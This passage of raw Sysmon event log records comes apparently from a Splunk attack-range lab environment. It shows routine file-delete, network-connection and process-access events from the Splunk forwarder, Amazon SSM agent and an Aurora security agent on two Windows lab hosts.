Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44A48A319BC0A7707C8D292406EA06EE,SHA256=F4EE95A3BE9021C9D4F8268C84A90690E987B78008BF7F9261311817821FC913,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:55.471{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CA11683DF40BA770AEFCC5623340AB1,SHA256=F8FDC73104946F4699C50B5B6B9FA21E6C296E15A364A637571BABE5A32AC9E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:55.315{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F54820122DEF80CBDF04F1D4C5DEACB8,SHA256=01C202228094EC047A28A35C9163A728821B21058280C6079B673E27BE05E2D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:55.007{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E38E086D49F4D20E538932F19C7D0F81,SHA256=AD41F4EDD5FB02BC824DE7AEA1AA5948952025A3EE89E51F3EA1715C818B2854,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018399Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:56.788{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=305BF3832ECFF610B9BD52BE15477B7F,SHA256=9539490938D917686463E67B47CFDF1F7F1664FC35C4327C7234532CD0BA280D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000046156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.503{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56454-false10.0.1.12-8000- 354300x800000000000000046155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.369{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56453-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000046154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:54.369{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56453-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000046153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:56.867{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-049MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:56.398{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56A6B1110CA31F8759DAEEF6015CA86F,SHA256=1844D43206CAD9D97FA1998A44EC9AFA1F508E57F1911FE86A2F67019CCA6970,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:56.288{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000046150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:56.288{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000046149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:56.287{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 23542300x800000000000000046148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:56.224{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=A9633FE990252DB5BC17CC57A8C9261D,SHA256=EC63766AC9C24AC3718FC42E5C2E747D63323ED5E99E6F0A9991838C765AC9BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018401Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:57.871{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8AFAB5FB3DF269414F12B1BAFF3F0E5,SHA256=7378B1770C614D2FC59CDC4D122E0D643FC03778698831F3543C372546A28CE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:57.874{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-050MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:57.483{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C760536046DA1813D90FE13185190200,SHA256=CC7816208245CDC77969FB459D228DABC84C4F60C857E7A1236873CCA0822BB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018400Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:54.973{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50177-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018402Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:58.957{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55BE24B3392FE82EE84C148FDF412E6C,SHA256=F4E740413BFD2815506B394FCF00FF6002ED4145AAB18CA5D7CCB601F088C407,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:58.564{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=140A0B13225AACE556AB390FD297063D,SHA256=EE111A406EF5F8833D8FC7DFC785CDE87C84F8F302EC035DCA48B3F303BB4294,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:59.657{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C38D61F1BDE8B9DE97952CB4DD2798,SHA256=74853ED8262D3C9BBDBAFEB98EBAE1EACA018905B10362D0270987175AAA843B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:00.734{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74C9DC6EB083AC41947ED18D25FC2498,SHA256=5DDFBDE0C889F98245F10247E64E2A4A187F3BE713017B17DD197D4257FD7688,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018404Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:00.636{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=7B1C9AD4C37C75AF4506FF562247E8B4,SHA256=87BF95A603B11D8BFBD5ABB1BA54D7D0616B09F89217AD96C099E641BBEFFCF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018403Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:00.038{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AA4A37F67927BC324B371F5B464DD27,SHA256=2E7FF5FEEAD57E88636B8169181E80B13E4EB16AD7F2F77EC116FD955840FAF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:00.530{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=FE5D2E151278A7769A8B176C6BFF3781,SHA256=F38FB92635EAAAEEA00D21865E260C2049EEEFF8C624F22ED0345ADA5F3A90DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000046164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:59.704{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56455-false10.0.1.12-8000- 23542300x800000000000000046163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:01.818{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DB27597036F3F34494A61CDCA6AAF2A,SHA256=A270EA8CF32FF90EA7A00CEA35B8C9077915BC0D62A5249ED613AE85BE42D7C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018405Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:01.120{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89D8E66E9E78F9F7FBD56F46145C123E,SHA256=B9CEB13851C6769FD8094768E8CA7A973790AF17E08341689ABD5938363BC83F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:02.906{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BD175DE5C87DC9F407A535EBE513074,SHA256=2483F6AE2BAAFE113931234006BBBD94597733D4146CBF241D5D46F89CFA449F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018438Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.759{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018437Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.753{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018436Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.752{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018435Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.745{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018434Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.742{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018433Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.739{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018432Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.734{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018431Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.729{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018430Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.726{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018429Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.722{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018428Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.721{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018427Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.711{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018426Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:02.706{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program 